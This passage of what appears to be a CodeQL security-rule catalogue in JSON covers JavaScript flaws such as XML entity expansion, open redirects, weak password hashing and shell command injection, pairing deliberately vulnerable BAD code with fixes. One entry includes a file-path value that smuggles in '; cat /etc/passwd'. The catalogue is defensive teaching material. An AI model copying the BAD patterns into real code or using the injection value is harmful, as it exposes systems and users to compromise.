req.body,\n    parser = new expat.Parser();\n  parser.on(\"startElement\", handleStart);\n  parser.on(\"text\", handleText);\n  parser.write(xmlSrc);\n});\n\n```\nAt the time of writing, `node-expat` does not provide a way of controlling entity expansion, but the example could be rewritten to use the `sax` package instead, which only expands standard entities such as `&amp;`:\n\n\n```javascript\nconst app = require(\"express\")(),\n  sax = require(\"sax\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = req.body,\n    parser = sax.parser(true);\n  parser.onopentag = handleStart;\n  parser.ontext = handleText;\n  parser.write(xmlSrc);\n});\n\n```\n\n## References\n* Wikipedia: [Billion Laughs](https://en.wikipedia.org/wiki/Billion_laughs).\n* Bryan Sullivan: [Security Briefs - XML Denial of Service Attacks and Defenses](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).\n* Common Weakness Enumeration: [CWE-776](https://cwe.mitre.org/data/definitions/776.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n"},"properties":{"tags":["security","external/cwe/cwe-776","external/cwe/cwe-400"],"description":"Parsing user input as an XML document with arbitrary internal\n              entity expansion is vulnerable to denial-of-service attacks.","id":"js/xml-bomb","kind":"path-problem","name":"XML internal entity expansion","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/cross-window-information-leak","name":"js/cross-window-information-leak","shortDescription":{"text":"Cross-window communication with unrestricted target origin"},"fullDescription":{"text":"When sending sensitive information to another window using `postMessage`, the origin of the target window should be restricted to avoid unintentional information leaks."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n","markdown":"# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n"},"properties":{"tags":["security","external/cwe/cwe-201","external/cwe/cwe-359"],"description":"When sending sensitive information to another window using `postMessage`,\n              the origin of the target window should be restricted to avoid unintentional\n              information leaks.","id":"js/cross-window-information-leak","kind":"path-problem","name":"Cross-window communication with unrestricted target origin","precision":"high","problem.severity":"error","security-severity":"4.3"}},{"id":"js/insufficient-key-size","name":"js/insufficient-key-size","shortDescription":{"text":"Use of a weak cryptographic key"},"fullDescription":{"text":"Using a weak cryptographic key can allow an attacker to compromise security."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Use of a weak cryptographic key\nModern encryption relies on it being computationally infeasible to break the cipher and decode a message without the key. As computational power increases, the ability to break ciphers grows and keys need to become larger.\n\n\n## Recommendation\nAn encryption key should be at least 2048-bit long when using RSA encryption, and 128-bit long when using symmetric encryption.\n\n\n## References\n* Wikipedia: [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)).\n* Wikipedia: [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard).\n* NodeJS: [Crypto](https://nodejs.org/api/crypto.html).\n* NIST: [ Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* Wikipedia: [Key size](https://en.wikipedia.org/wiki/Key_size)\n* Common Weakness Enumeration: [CWE-326](https://cwe.mitre.org/data/definitions/326.html).\n","markdown":"# Use of a weak cryptographic key\nModern encryption relies on it being computationally infeasible to break the cipher and decode a message without the key. As computational power increases, the ability to break ciphers grows and keys need to become larger.\n\n\n## Recommendation\nAn encryption key should be at least 2048-bit long when using RSA encryption, and 128-bit long when using symmetric encryption.\n\n\n## References\n* Wikipedia: [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)).\n* Wikipedia: [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard).\n* NodeJS: [Crypto](https://nodejs.org/api/crypto.html).\n* NIST: [ Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* Wikipedia: [Key size](https://en.wikipedia.org/wiki/Key_size)\n* Common Weakness Enumeration: [CWE-326](https://cwe.mitre.org/data/definitions/326.html).\n"},"properties":{"tags":["security","external/cwe/cwe-326"],"description":"Using a weak cryptographic key can allow an attacker to compromise security.","id":"js/insufficient-key-size","kind":"problem","name":"Use of a weak cryptographic key","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/insufficient-password-hash","name":"js/insufficient-password-hash","shortDescription":{"text":"Use of password hash with insufficient computational effort"},"fullDescription":{"text":"Creating a hash of a password with low computational effort makes the hash vulnerable to password cracking attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Use of password hash with insufficient computational effort\nStoring cryptographic hashes of passwords is standard security practice, but it is equally important to select the right hashing scheme. If an attacker obtains the hashed passwords of an application, the password hashing scheme should still prevent the attacker from easily obtaining the original cleartext passwords.\n\nA good password hashing scheme requires a computation that cannot be done efficiently. Standard hashing schemes, such as `md5` or `sha1`, are efficiently computable, and are therefore not suitable for password hashing.\n\n\n## Recommendation\nUse a secure password hashing scheme such as `bcrypt`, `scrypt`, `PBKDF2`, or `Argon2`.\n\n\n## Example\nIn the example below, the `md5` algorithm computes the hash of a password.\n\n\n```javascript\nconst crypto = require(\"crypto\");\nfunction hashPassword(password) {\n    var hasher = crypto.createHash('md5');\n    var hashed = hasher.update(password).digest(\"hex\"); // BAD\n    return hashed;\n}\n\n```\nThis is not secure, since the password can be efficiently cracked by an attacker that obtains the hash. A more secure scheme is to hash the password with the `bcrypt` algorithm:\n\n\n```javascript\nconst bcrypt = require(\"bcrypt\");\nfunction hashPassword(password, salt) {\n  var hashed = bcrypt.hashSync(password, salt); // GOOD\n  return hashed;\n}\n\n```\n\n## References\n* OWASP: [Password storage](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-916](https://cwe.mitre.org/data/definitions/916.html).\n","markdown":"# Use of password hash with insufficient computational effort\nStoring cryptographic hashes of passwords is standard security practice, but it is equally important to select the right hashing scheme. If an attacker obtains the hashed passwords of an application, the password hashing scheme should still prevent the attacker from easily obtaining the original cleartext passwords.\n\nA good password hashing scheme requires a computation that cannot be done efficiently. Standard hashing schemes, such as `md5` or `sha1`, are efficiently computable, and are therefore not suitable for password hashing.\n\n\n## Recommendation\nUse a secure password hashing scheme such as `bcrypt`, `scrypt`, `PBKDF2`, or `Argon2`.\n\n\n## Example\nIn the example below, the `md5` algorithm computes the hash of a password.\n\n\n```javascript\nconst crypto = require(\"crypto\");\nfunction hashPassword(password) {\n    var hasher = crypto.createHash('md5');\n    var hashed = hasher.update(password).digest(\"hex\"); // BAD\n    return hashed;\n}\n\n```\nThis is not secure, since the password can be efficiently cracked by an attacker that obtains the hash. A more secure scheme is to hash the password with the `bcrypt` algorithm:\n\n\n```javascript\nconst bcrypt = require(\"bcrypt\");\nfunction hashPassword(password, salt) {\n  var hashed = bcrypt.hashSync(password, salt); // GOOD\n  return hashed;\n}\n\n```\n\n## References\n* OWASP: [Password storage](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-916](https://cwe.mitre.org/data/definitions/916.html).\n"},"properties":{"tags":["security","external/cwe/cwe-916"],"description":"Creating a hash of a password with low computational effort makes the hash vulnerable to password cracking attacks.","id":"js/insufficient-password-hash","kind":"path-problem","name":"Use of password hash with insufficient computational effort","precision":"high","problem.severity":"warning","security-severity":"8.1"}},{"id":"js/insecure-randomness","name":"js/insecure-randomness","shortDescription":{"text":"Insecure randomness"},"fullDescription":{"text":"Using a cryptographically weak pseudo-random number generator to generate a security-sensitive value may allow an attacker to predict what value will be generated."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Insecure randomness\nUsing a cryptographically weak pseudo-random number generator to generate a security-sensitive value, such as a password, makes it easier for an attacker to predict the value.\n\nPseudo-random number generators generate a sequence of numbers that only approximates the properties of random numbers. The sequence is not truly random because it is completely determined by a relatively small set of initial values, the seed. If the random number generator is cryptographically weak, then this sequence may be easily predictable through outside observations.\n\n\n## Recommendation\nUse a cryptographically secure pseudo-random number generator if the output is to be used in a security-sensitive context. As a rule of thumb, a value should be considered \"security-sensitive\" if predicting it would allow the attacker to perform an action that they would otherwise be unable to perform. For example, if an attacker could predict the random password generated for a new user, they would be able to log in as that new user.\n\nFor JavaScript on the NodeJS platform, `crypto.getRandomBytes` provides a cryptographically secure pseudo-random byte generator. Note that the conversion from bytes to numbers can introduce bias that breaks the security.\n\nFor JavaScript in the browser, `crypto.getRandomValues` provides a cryptographically secure pseudo-random number generator.\n\n\n## Example\nThe following examples show different ways of generating a password.\n\nIn the first case, we generate a fresh password by appending a random integer to the end of a static string. The random number generator used (`Math.random`) is not cryptographically secure, so it may be possible for an attacker to predict the generated password.\n\n\n```javascript\nfunction insecurePassword() {\n    // BAD: the random suffix is not cryptographically secure\n    var suffix = Math.random();\n    var password = \"myPassword\" + suffix;\n    return password;\n}\n\n```\nIn the second example, a cryptographically secure random number generator is used for the same purpose. In this case, it is much harder to predict the generated integers.\n\n\n```javascript\nfunction securePassword() {\n    // GOOD: the random suffix is cryptographically secure\n    var suffix = window.crypto.getRandomValues(new Uint32Array(1))[0];\n    var password = \"myPassword\" + suffix;\n    \n    // GOOD: if a random value between 0 and 1 is desired\n    var secret = window.crypto.getRandomValues(new Uint32Array(1))[0] * Math.pow(2,-32);\n}\n\n```\n\n## References\n* Wikipedia: [Pseudo-random number generator](http://en.wikipedia.org/wiki/Pseudorandom_number_generator).\n* Mozilla Developer Network: [Crypto: getRandomValues()](https://developer.mozilla.org/en-US/docs/Web/API/Crypto/getRandomValues).\n* NodeJS: [crypto.randomBytes](https://nodejs.org/api/crypto.html#crypto_crypto_randombytes_size_callback)\n* Common Weakness Enumeration: [CWE-338](https://cwe.mitre.org/data/definitions/338.html).\n","markdown":"# Insecure randomness\nUsing a cryptographically weak pseudo-random number generator to generate a security-sensitive value, such as a password, makes it easier for an attacker to predict the value.\n\nPseudo-random number generators generate a sequence of numbers that only approximates the properties of random numbers. The sequence is not truly random because it is completely determined by a relatively small set of initial values, the seed. If the random number generator is cryptographically weak, then this sequence may be easily predictable through outside observations.\n\n\n## Recommendation\nUse a cryptographically secure pseudo-random number generator if the output is to be used in a security-sensitive context. As a rule of thumb, a value should be considered \"security-sensitive\" if predicting it would allow the attacker to perform an action that they would otherwise be unable to perform. For example, if an attacker could predict the random password generated for a new user, they would be able to log in as that new user.\n\nFor JavaScript on the NodeJS platform, `crypto.getRandomBytes` provides a cryptographically secure pseudo-random byte generator. Note that the conversion from bytes to numbers can introduce bias that breaks the security.\n\nFor JavaScript in the browser, `crypto.getRandomValues` provides a cryptographically secure pseudo-random number generator.\n\n\n## Example\nThe following examples show different ways of generating a password.\n\nIn the first case, we generate a fresh password by appending a random integer to the end of a static string. The random number generator used (`Math.random`) is not cryptographically secure, so it may be possible for an attacker to predict the generated password.\n\n\n```javascript\nfunction insecurePassword() {\n    // BAD: the random suffix is not cryptographically secure\n    var suffix = Math.random();\n    var password = \"myPassword\" + suffix;\n    return password;\n}\n\n```\nIn the second example, a cryptographically secure random number generator is used for the same purpose. In this case, it is much harder to predict the generated integers.\n\n\n```javascript\nfunction securePassword() {\n    // GOOD: the random suffix is cryptographically secure\n    var suffix = window.crypto.getRandomValues(new Uint32Array(1))[0];\n    var password = \"myPassword\" + suffix;\n    \n    // GOOD: if a random value between 0 and 1 is desired\n    var secret = window.crypto.getRandomValues(new Uint32Array(1))[0] * Math.pow(2,-32);\n}\n\n```\n\n## References\n* Wikipedia: [Pseudo-random number generator](http://en.wikipedia.org/wiki/Pseudorandom_number_generator).\n* Mozilla Developer Network: [Crypto: getRandomValues()](https://developer.mozilla.org/en-US/docs/Web/API/Crypto/getRandomValues).\n* NodeJS: [crypto.randomBytes](https://nodejs.org/api/crypto.html#crypto_crypto_randombytes_size_callback)\n* Common Weakness Enumeration: [CWE-338](https://cwe.mitre.org/data/definitions/338.html).\n"},"properties":{"tags":["security","external/cwe/cwe-338"],"description":"Using a cryptographically weak pseudo-random number generator to generate a\n              security-sensitive value may allow an attacker to predict what value will\n              be generated.","id":"js/insecure-randomness","kind":"path-problem","name":"Insecure randomness","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/server-side-unvalidated-url-redirection","name":"js/server-side-unvalidated-url-redirection","shortDescription":{"text":"Server-side URL redirect"},"fullDescription":{"text":"Server-side URL redirection based on unvalidated user input may cause redirection to malicious web sites."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Server-side URL redirect\nDirectly incorporating user input into a URL redirect request without validating the input can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\nIf this is not possible, then the user input should be validated in some other way, for example, by verifying that the target URL is on the same host as the current page.\n\n\n## Example\nThe following example shows an HTTP request parameter being used directly in a URL redirect without validating the input, which facilitates phishing attacks:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"/redirect\", function (req, res) {\n  // BAD: a request parameter is incorporated without validation into a URL redirect\n  res.redirect(req.query[\"target\"]);\n});\n\n```\nOne way to remedy the problem is to validate the user input against a known fixed string before doing the redirection:\n\n\n```javascript\nconst app = require(\"express\")();\n\nconst VALID_REDIRECT = \"http://cwe.mitre.org/data/definitions/601.html\";\n\napp.get(\"/redirect\", function (req, res) {\n  // GOOD: the request parameter is validated against a known fixed string\n  let target = req.query[\"target\"];\n  if (VALID_REDIRECT === target) {\n    res.redirect(target);\n  } else {\n    res.redirect(\"/\");\n  }\n});\n\n```\nAlternatively, we can check that the target URL does not redirect to a different host by parsing it relative to a base URL with a known host and verifying that the host stays the same:\n\n\n```javascript\nconst app = require(\"express\")();\n\nfunction isLocalUrl(path) {\n  try {\n    return (\n      // TODO: consider substituting your own domain for example.com\n      new URL(path, \"https://example.com\").origin === \"https://example.com\"\n    );\n  } catch (e) {\n    return false;\n  }\n}\n\napp.get(\"/redirect\", function (req, res) {\n  // GOOD: check that we don't redirect to a different host\n  let target = req.query[\"target\"];\n  if (isLocalUrl(target)) {\n    res.redirect(target);\n  } else {\n    res.redirect(\"/\");\n  }\n});\n\n```\nNote that as written, the above code will allow redirects to URLs on `example.com`, which is harmless but perhaps not intended. You can substitute your own domain (if known) for `example.com` to prevent this.\n\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n","markdown":"# Server-side URL redirect\nDirectly incorporating user input into a URL redirect request without validating the input can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\nIf this is not possible, then the user input should be validated in some other way, for example, by verifying that the target URL is on the same host as the current page.\n\n\n## Example\nThe following example shows an HTTP request parameter being used directly in a URL redirect without validating the input, which facilitates phishing attacks:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"/redirect\", function (req, res) {\n  // BAD: a request parameter is incorporated without validation into a URL redirect\n  res.redirect(req.query[\"target\"]);\n});\n\n```\nOne way to remedy the problem is to validate the user input against a known fixed string before doing the redirection:\n\n\n```javascript\nconst app = require(\"express\")();\n\nconst VALID_REDIRECT = \"http://cwe.mitre.org/data/definitions/601.html\";\n\napp.get(\"/redirect\", function (req, res) {\n  // GOOD: the request parameter is validated against a known fixed string\n  let target = req.query[\"target\"];\n  if (VALID_REDIRECT === target) {\n    res.redirect(target);\n  } else {\n    res.redirect(\"/\");\n  }\n});\n\n```\nAlternatively, we can check that the target URL does not redirect to a different host by parsing it relative to a base URL with a known host and verifying that the host stays the same:\n\n\n```javascript\nconst app = require(\"express\")();\n\nfunction isLocalUrl(path) {\n  try {\n    return (\n      // TODO: consider substituting your own domain for example.com\n      new URL(path, \"https://example.com\").origin === \"https://example.com\"\n    );\n  } catch (e) {\n    return false;\n  }\n}\n\napp.get(\"/redirect\", function (req, res) {\n  // GOOD: check that we don't redirect to a different host\n  let target = req.query[\"target\"];\n  if (isLocalUrl(target)) {\n    res.redirect(target);\n  } else {\n    res.redirect(\"/\");\n  }\n});\n\n```\nNote that as written, the above code will allow redirects to URLs on `example.com`, which is harmless but perhaps not intended. You can substitute your own domain (if known) for `example.com` to prevent this.\n\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n"},"properties":{"tags":["security","external/cwe/cwe-601"],"description":"Server-side URL redirection based on unvalidated user input\n              may cause redirection to malicious web sites.","id":"js/server-side-unvalidated-url-redirection","kind":"path-problem","name":"Server-side URL redirect","precision":"high","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/client-side-unvalidated-url-redirection","name":"js/client-side-unvalidated-url-redirection","shortDescription":{"text":"Client-side URL redirect"},"fullDescription":{"text":"Client-side URL redirection based on unvalidated user input may cause redirection to malicious web sites."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Client-side URL redirect\nRedirecting to a URL that is constructed from parts of the DOM that may be controlled by an attacker can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\n\n## Example\nThe following example uses a regular expression to extract a query parameter from the document URL, and then uses it to construct a new URL to redirect to without any further validation. This may allow an attacker to craft a link that redirects from a trusted website to some arbitrary website of their choosing, which facilitates phishing attacks:\n\n\n```javascript\nwindow.location = /.*redirect=([^&]*).*/.exec(document.location.href)[1];\n\n```\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n","markdown":"# Client-side URL redirect\nRedirecting to a URL that is constructed from parts of the DOM that may be controlled by an attacker can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\n\n## Example\nThe following example uses a regular expression to extract a query parameter from the document URL, and then uses it to construct a new URL to redirect to without any further validation. This may allow an attacker to craft a link that redirects from a trusted website to some arbitrary website of their choosing, which facilitates phishing attacks:\n\n\n```javascript\nwindow.location = /.*redirect=([^&]*).*/.exec(document.location.href)[1];\n\n```\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116","external/cwe/cwe-601"],"description":"Client-side URL redirection based on unvalidated user input\n              may cause redirection to malicious web sites.","id":"js/client-side-unvalidated-url-redirection","kind":"path-problem","name":"Client-side URL redirect","precision":"high","problem.severity":"error","security-severity":"6.1"}},{"id":"js/insecure-download","name":"js/insecure-download","shortDescription":{"text":"Download of sensitive file through insecure connection"},"fullDescription":{"text":"Downloading executables and other sensitive files over an insecure connection opens up for potential man-in-the-middle attacks."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Download of sensitive file through insecure connection\nDownloading executables or other sensitive files over an unencrypted connection can leave a server open to man-in-the-middle attacks (MITM). Such an attack can allow an attacker to insert arbitrary content into the downloaded file, and in the worst case, allow the attacker to execute arbitrary code on the vulnerable system.\n\n\n## Recommendation\nUse a secure transfer protocol when downloading executables or other sensitive files.\n\n\n## Example\nIn this example, a server downloads a shell script from a remote URL using the `node-fetch` library, and then executes this shell script.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('http://mydownload.example.org/myscript.sh')\n    .then(res => res.text())\n    .then(script => cp.execSync(script));\n```\nThe HTTP protocol is vulnerable to MITM, and thus an attacker could potentially replace the downloaded shell script with arbitrary code, which gives the attacker complete control over the system.\n\nThe issue has been fixed in the example below by replacing the HTTP protocol with the HTTPS protocol.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('https://mydownload.example.org/myscript.sh')\n    .then(res => res.text())\n    .then(script => cp.execSync(script));\n```\n\n## References\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n","markdown":"# Download of sensitive file through insecure connection\nDownloading executables or other sensitive files over an unencrypted connection can leave a server open to man-in-the-middle attacks (MITM). Such an attack can allow an attacker to insert arbitrary content into the downloaded file, and in the worst case, allow the attacker to execute arbitrary code on the vulnerable system.\n\n\n## Recommendation\nUse a secure transfer protocol when downloading executables or other sensitive files.\n\n\n## Example\nIn this example, a server downloads a shell script from a remote URL using the `node-fetch` library, and then executes this shell script.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('http://mydownload.example.org/myscript.sh')\n    .then(res => res.text())\n    .then(script => cp.execSync(script));\n```\nThe HTTP protocol is vulnerable to MITM, and thus an attacker could potentially replace the downloaded shell script with arbitrary code, which gives the attacker complete control over the system.\n\nThe issue has been fixed in the example below by replacing the HTTP protocol with the HTTPS protocol.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('https://mydownload.example.org/myscript.sh')\n    .then(res => res.text())\n    .then(script => cp.execSync(script));\n```\n\n## References\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n"},"properties":{"tags":["security","external/cwe/cwe-829"],"description":"Downloading executables and other sensitive files over an insecure connection\n              opens up for potential man-in-the-middle attacks.","id":"js/insecure-download","kind":"path-problem","name":"Download of sensitive file through insecure connection","precision":"high","problem.severity":"error","security-severity":"8.1"}},{"id":"js/shell-command-injection-from-environment","name":"js/shell-command-injection-from-environment","shortDescription":{"text":"Shell command built from environment values"},"fullDescription":{"text":"Building a shell command string with values from the enclosing environment may cause subtle bugs or vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Shell command built from environment values\nDynamically constructing a shell command with values from the local environment, such as file paths, may inadvertently change the meaning of the shell command. Such changes can occur when an environment value contains characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, use hard-coded string literals to specify the shell command to run, and provide the dynamic arguments to the shell command separately to avoid interpretation by the shell.\n\nAlternatively, if the shell command must be constructed dynamically, then add code to ensure that special characters in environment values do not alter the shell command unexpectedly.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that recursively removes a temporary directory that is located next to the currently executing JavaScript file. Such utilities are often found in custom build scripts.\n\n\n```javascript\nvar cp = require(\"child_process\"),\n  path = require(\"path\");\nfunction cleanupTemp() {\n  let cmd = \"rm -rf \" + path.join(__dirname, \"temp\");\n  cp.execSync(cmd); // BAD\n}\n\n```\nThe shell command will, however, fail to work as intended if the absolute path of the script's directory contains spaces. In that case, the shell command will interpret the absolute path as multiple paths, instead of a single path.\n\nFor instance, if the absolute path of the temporary directory is `/home/username/important project/temp`, then the shell command will recursively delete `/home/username/important` and `project/temp`, where the latter path gets resolved relative to the working directory of the JavaScript process.\n\nEven worse, although less likely, a malicious user could provide the path `/home/username/; cat /etc/passwd #/important project/temp` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the directory as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n  path = require(\"path\");\nfunction cleanupTemp() {\n  let cmd = \"rm\",\n    args = [\"-rf\", path.join(__dirname, \"temp\")];\n  cp.execFileSync(cmd, args); // GOOD\n}\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n","markdown":"# Shell command built from environment values\nDynamically constructing a shell command with values from the local environment, such as file paths, may inadvertently change the meaning of the shell command. Such changes can occur when an environment value contains characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, use hard-coded string literals to specify the shell command to run, and provide the dynamic arguments to the shell command separately to avoid interpretation by the shell.\n\nAlternatively, if the shell command must be constructed dynamically, then add code to ensure that special characters in environment values do not alter the shell command unexpectedly.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that recursively removes a temporary directory that is located next to the currently executing JavaScript file. Such utilities are often found in custom build scripts.\n\n\n```javascript\nvar cp = require(\"child_process\"),\n  path = require(\"path\");\nfunction cleanupTemp() {\n  let cmd = \"rm -rf \" + path.join(__dirname, \"temp\");\n  cp.execSync(cmd); // BAD\n}\n\n```\nThe shell command will, however, fail to work as intended if the absolute path of the script's directory contains spaces. In that case, the shell command will interpret the absolute path as multiple paths, instead of a single path.\n\nFor instance, if the absolute path of the temporary directory is `/home/username/important project/temp`, then the shell command will recursively delete `/home/username/important` and `project/temp`, where the latter path gets resolved relative to the working directory of the JavaScript process.\n\nEven worse, although less likely, a malicious user could provide the path `/home/username/; cat /etc/passwd #/important project/temp` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the directory as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n  path = require(\"path\");\nfunction cleanupTemp() {\n  let cmd = \"rm\",\n    args = [\"-rf\", path.join(__dirname, \"temp\")];\n  